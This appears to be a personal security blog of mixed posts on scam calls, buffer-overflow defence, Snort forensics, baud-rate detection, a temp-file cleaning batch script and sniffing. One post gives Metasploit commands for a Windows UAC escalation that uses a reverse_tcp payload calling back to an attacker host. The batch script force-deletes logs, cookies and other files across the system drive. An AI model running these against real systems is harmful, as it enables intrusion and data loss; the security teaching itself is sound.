Sunday, 24 June 2018

Eleven Tips for Women and Children to Avoid Scam Calls

 

Phone scams are common these days, and keeping women and children from being trapped by scammers is a real challenge.

You and the family members you love can stay safe from such scams by following the tips below: 

  1. Don't answer calls from unknown numbers. If you answer such a call, hang up immediately.
  2. You may not be able to tell right away if an incoming call is spoofed. Be aware: Caller ID showing a "local" number does not necessarily mean it is a local caller.
  3. If you answer the phone and the caller - or a recording - asks you to hit a button to stop getting the calls, you should just hang up. Scammers often use this trick to identify potential targets.
  4. Do not respond to any questions, especially those that can be answered with "Yes."
  5. Never give out personal information such as account numbers, Social Security numbers, mother's maiden names, passwords or other identifying information in response to unexpected calls or if you are at all suspicious.
  6. If you get an inquiry from someone who says they represent a company or a government agency, hang up and call the phone number on your account statement, in the phone book, or on the company's or government agency's website to verify the authenticity of the request. You will usually get a written statement in the mail before you get a phone call from a legitimate source, particularly if the caller is asking for a payment.
  7. Use caution if you are being pressured for information immediately.
  8. If you have a voice mail account with your phone service, be sure to set a password for it. Some voicemail services are preset to allow access if you call in from your own phone number. A hacker could spoof your home phone number and gain access to your voice mail if you do not set a password.
  9. Talk to your phone company about call blocking tools they may have and check into apps that you can download to your mobile device to block unwanted calls.
  10. If you use robocall-blocking technology already, it often helps to let that company know which numbers are producing unwanted calls so they can help block those calls for you and others.
  11. To block telemarketing calls, register your number on the Do Not Call List. Legitimate telemarketers consult the list to avoid calling both landline and wireless phone numbers on the list.

Tuesday, 10 October 2017

How to Target Buffer Overflows and Countermeasure

A large number of exploits have been due to sloppy software development. 

Writing past the end of an array is referred to in security circles as a "Buffer Overflow."

Buffer overflows are targeted on both the stack and the heap.

As a researcher, where should you look for buffer overflows in the target programme?

  1. Stack allocation - is the stack address randomised?
  2. Unchecked array index usage - is the index validated against the array length before the access?
  3. Copying a given argument into a local array - is the code checking the length of the input against the size of the array?
  4. Supplying a carefully constructed string argument - is the code rejecting over-long or malicious inputs?
  5. The string carries executable machine code - does the memory it lands in have execute permission?

How to Detect Buffer Overflow Scenarios
  1. Monitor execve() calls and check which process makes them: a shell spawned by a process that never normally starts one is a classic sign of shellcode running
  2. Deep packet inspection - monitoring network traffic for known exploit payloads (NOP sleds, shellcode signatures)
  3. Tools: Chaperon, Valgrind, CCured, CRED, Insure++, ProPolice, TinyCC (with bounds checking) and many more.

Proactively prevent your programme from being exploited:
  1. CPU/MMU: mark data pages (stack, heap) non-executable so that injected machine code cannot run even if it is written there
    1. noexec_user_stack (Solaris kernel setting)
    2. Never-eXecute (NX) bit http://en.wikipedia.org/wiki/NX_bit
    3. Intel: XD bit, eXecute Disable
    4. AMD: Enhanced Virus Protection (AMD's name for NX)
    5. ARM: XN for eXecute Never
  2. Stack top randomization
  3. ASLR - Address Space Layout Randomization, so that the attacker cannot predict where the stack, heap and libraries are
  4. Run-time check for input taintedness
  5. Run-time check for array bounds (length checks before every copy and index)
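The three checks above (items 2, 3 and 4 of the researcher's list, and items 4 and 5 of the prevention list) are easiest to see side by side. The following is an added example written for this post, not code from the original article: the classic unchecked strcpy() into a stack buffer, the arithmetic for how far a given argument overruns it, and a hardened copy and index lookup that refuse input that does not fit. The buffer size BUF_LEN and the function names are assumptions for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_LEN 16   /* assumed size of the local array in the target */

/* Item 3 above, the classic bug: strcpy() copies until it finds a NUL, so an
 * argument of BUF_LEN or more characters writes past 'buf' into whatever the
 * compiler placed above it on the stack (other locals, the saved frame
 * pointer, the return address). Kept here only for comparison; never call it
 * with untrusted input. */
void copy_unchecked(const char *arg) {
    char buf[BUF_LEN];
    strcpy(buf, arg);          /* no length check: stack buffer overflow */
    puts(buf);
}

/* How many bytes strcpy() would write beyond a buffer of 'buf_len' bytes for
 * this argument (0 when it fits, counting the terminating NUL). This is the
 * arithmetic behind the "carefully constructed string" of item 4: the first
 * byte past the end of the buffer is where the smash starts. */
size_t overflow_bytes(const char *arg, size_t buf_len) {
    size_t need = strlen(arg) + 1;
    return need > buf_len ? need - buf_len : 0;
}

/* Hardened form of copy_unchecked(): the copy is bounded by the destination
 * size (run-time bounds check), and an argument that does not fit is rejected
 * rather than silently truncated, which would hide the oversized input from
 * the caller. Returns 0 on success, -1 when the input would overflow. */
int copy_checked(char *dst, size_t dst_len, const char *src) {
    size_t n = 0;
    if (dst_len == 0) return -1;
    while (n < dst_len && src[n] != '\0')   /* never read past dst_len bytes of src */
        n++;
    if (n == dst_len) return -1;            /* no room for the NUL: would overflow */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Item 2, the same idea for indexes: validate against the array length before
 * the access, never after. Returns 0 and stores the value, or -1 if out of range. */
int table_get(const int *table, size_t table_len, size_t idx, int *out) {
    if (idx >= table_len) return -1;
    *out = table[idx];
    return 0;
}

int main(int argc, char **argv) {
    char local[BUF_LEN];
    const char *arg = argc > 1 ? argv[1] : "hello";
    printf("strcpy() into %d bytes would overflow by %zu byte(s)\n",
           BUF_LEN, overflow_bytes(arg, BUF_LEN));
    if (copy_checked(local, sizeof local, arg) == 0)
        printf("copied: %s\n", local);
    else
        printf("rejected: argument longer than %d characters\n", BUF_LEN - 1);
    return 0;
}
```

Run it with a long argument (for example 40 'A's) to see the overrun size that copy_unchecked() would have written and the hardened copy refusing the input; only copy_unchecked() is left in the program to compare against, and the main() never calls it.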

At which stages of the SDLC can buffer overflows be identified and fixed?
1. Source code development stage (code review, compiler hardening such as ProPolice, static analysis)
2. Product validation stage (fuzzing, run-time checkers such as Valgrind)


Friday, 15 November 2013

TestBed: Identify Network Attacks for your Forensics --- SNORT + PCAP

In our analysis we deploy the tools below on a single host:
    a. TSHARK
    b. SNORT (loaded with the latest rule-set from http://rules.emergingthreats.net/ )
    c. TCPREPLAY

START:
1. Bring up the eth0 interface with the promiscuous flag enabled (so the sniffer sees every frame, not only those addressed to this host)
       root@n41k# ifconfig eth0 up (waking up eth0 interface)
       root@n41k# ifconfig eth0 promisc (enable promiscuous flag)
       root@n41k# ifconfig eth0 -promisc (after analysis, remove the promiscuous flag)

Output:
eth0      Link encap:Ethernet  HWaddr 00:aa:b9:c8:d5:6f  
             UP BROADCAST PROMISC MULTICAST  MTU:1500  Metric:1
             RX packets:0 errors:0 dropped:0 overruns:0 frame:0
             TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
             RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
             Interrupt:45 Base address:0x4000 

2. Analyze the network traffic capture with TSHARK (the -R read filter shown here is the tshark 1.x syntax; on newer releases use -Y for a display filter, since -R now requires a two-pass run with -2)
        root@n41k# tshark -R "tcp.port==80" -r /home/n41k/threat/botnet.pcap 
        root@n41k# tshark -R "http.response.code == 200" -r /home/n41k/threat/botnet.pcap 
        root@n41k# tshark -R "http.response.code == 404" -r /home/n41k/threat/botnet.pcap 
        root@n41k# tshark -R 'http.request.method == "GET" || http.request.method == "POST"' -r /home/n41k/threat/botnet.pcap 

3. Configure SNORT and Verify the process list

4. Inject the packets (replay the capture onto eth0 at top speed so SNORT sees it as live traffic)
     root@n41k# tcpreplay -i eth0 -t /home/n41k/threat/botnet.pcap

5. Monitor the SNORT logs.
    root@n41k# tail -f /var/log/snort/snort.alert

6. Further analysis and verification of the domains and hosts listed in the alerts
          • http://support.clean-mx.de/clean-mx/viruses.php
          • http://malc0de.com/database/
          • http://www.malwareblacklist.com/showMDL.php
          • http://www.malwaredomainlist.com/mdl.php
          • http://www.malwareurl.com/listing-urls.php


Saturday, 16 February 2013

Discover the Baud Rate of your Embedded device

Finding the baud rate of an unknown device's serial console without owning any specs is a rewarding exercise...

Tool: baudrate.py
Reference: https://code.google.com/p/baudrate/source/browse/trunk/src/baudrate.py

Sample Usage:
#  ./baudrate.py -p /dev/ttyS0  (or)
$ sudo ./baudrate.py -p /dev/ttyUSB0

>> Change the baud rate manually by pressing the UP / DOWN arrow keys



Starting baudrate detection on /dev/ttyUSB0, turn on your serial device now.
Press Ctl+C to quit.


@@@@@@@@@@@@@@@@@@@@@ Baudrate: 115200 @@@@@@@@@@@@@@@@@@@@@
Detected baudrate: 115200

Save minicom configuration as: minicom1
 
Configuration saved. Run minicom now [n/Y]? n
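What the tool is doing while you press UP / DOWN is reading bytes from the port at each candidate rate and judging whether they look like console text: at the wrong rate the UART mis-frames every character and you get bytes scattered across 0x00-0xff, at the right rate you get a readable boot banner. The following is an added example of that heuristic in C, written for this post; it is not the code of baudrate.py, and the exact scoring rule of the real tool is an assumption here. The port reader is injected as a function pointer so the example runs offline against a constructed fake port (the real thing would configure the port with termios and read() from it); the candidate list, banner text and threshold are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Candidate rates, in the order a manual UP/DOWN walk would cover them (assumed list). */
static const unsigned int baud_candidates[] = {9600, 19200, 38400, 57600, 115200};
#define N_CANDIDATES (sizeof baud_candidates / sizeof baud_candidates[0])

/* Hypothetical port reader: configure the port at 'baud', return up to 'len'
 * bytes in 'buf'. A real implementation would use cfsetispeed()/read(). */
typedef size_t (*port_read_fn)(unsigned int baud, uint8_t *buf, size_t len, void *ctx);

/* A byte is plausible console output if it is printable ASCII or one of the
 * whitespace characters a boot log contains. */
static int is_console_byte(uint8_t b) {
    return (b >= 0x20 && b <= 0x7e) || b == '\n' || b == '\r' || b == '\t';
}

/* Longest run of consecutive plausible bytes in the sample. Mis-clocked
 * framing rarely produces a long clean run, so this separates the rates well. */
size_t longest_clean_run(const uint8_t *buf, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = is_console_byte(buf[i]) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Try each candidate; return the first rate whose sample contains a clean run
 * of at least 'threshold' bytes, or 0 if none qualifies. */
unsigned int detect_baud(port_read_fn reader, void *ctx, size_t threshold) {
    uint8_t sample[256];
    for (size_t i = 0; i < N_CANDIDATES; i++) {
        size_t n = reader(baud_candidates[i], sample, sizeof sample, ctx);
        if (longest_clean_run(sample, n) >= threshold)
            return baud_candidates[i];
    }
    return 0;
}

/* Constructed fake port for offline use: a readable banner at 'true_baud',
 * deterministic pseudo-random garbage with stray high-bit bytes otherwise. */
struct fake_port { unsigned int true_baud; };

size_t fake_port_read(unsigned int baud, uint8_t *buf, size_t len, void *ctx) {
    const struct fake_port *p = ctx;
    static const char banner[] =
        "Boot banner (constructed sample)\r\nHit any key to stop autoboot:  3\r\n";
    if (baud == p->true_baud) {
        size_t n = strlen(banner);
        if (n > len) n = len;
        memcpy(buf, banner, n);
        return n;
    }
    uint32_t x = 0x9e3779b9u ^ baud;            /* seed differs per rate */
    for (size_t i = 0; i < len; i++) {
        x = x * 1664525u + 1013904223u;          /* LCG: good enough for fake noise */
        buf[i] = (uint8_t)(x >> 24);
        if (i % 3 == 0) buf[i] |= 0x80;          /* a non-ASCII byte at least every 3rd position */
    }
    return len;
}

int main(void) {
    struct fake_port port = { 115200 };          /* pretend the device talks at 115200 */
    unsigned int found = detect_baud(fake_port_read, &port, 16);
    if (found)
        printf("Detected baudrate: %u\n", found);
    else
        printf("No candidate rate produced readable output\n");
    return 0;
}
```

Swapping fake_port_read() for a reader that opens the real tty is the only change needed to use this against hardware; the threshold of 16 clean bytes is deliberately larger than the 2-byte runs the fake noise can produce, and on a real port it should be raised if the device emits only short prompts.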

Tuesday, 13 November 2012

Good Virus - Clean and Speed your PC

Create a .BAT file that deletes temporary files so your PC has less clutter and runs faster.

Note before running it: the *.log and *.old patterns recurse over the whole system drive, so they also remove application and Windows log files you may need later for troubleshooting or forensics; trim those lines if you want to keep them.

Open a new file, paste the code below and save it as GoodVirus.bat


@echo off
echo Internet Sweep ....
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old

del /f /s /q %systemdrive%\recycled\*.*
echo Cleaned Temporary Data
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*

echo Cleaning IE Temp data.....
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo Completed!!!

echo Your PC is now Speed enough :)
echo. & pause

Monday, 15 October 2012

Windows 7 is hacked !!!! Threat: UAC


Test-Bed

Attacker: Backtrack 5
Victim PC: Windows 7 - UPDATED
[Attacker] ----------|Switch/Router|----------[Victim]
Procedure
1. Update the Metasploit repository 
      # msfupdate 
2. Prepare the attacker machine (this is a local privilege-escalation module, so it needs an existing meterpreter session on the victim, here session 1, obtained beforehand; the module asks the victim for elevation through a UAC dialog and only succeeds if the user clicks Yes)
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.9.9
set session 1
exploit
3. OUTPUT
     "Windows7 is hacked"

Saturday, 4 February 2012

Network Sniffing - Facts

A few secrets which can be revealed by sniffing:
1. MAC & IP addresses --> Helpful for spoofing (hide your identity / impersonate an authorised user)
2. Exposed services --> Revealing running services & their versions 
3. Passwords --> Sent in the clear by plain-text protocols 
4. Security feature detection --> Identifying running security functions (FW/AV/IPS/VPN/WAF)
5. Debugging --> Conformance testing, IoT devices, etc.
6. Investigations --> Post-incident analysis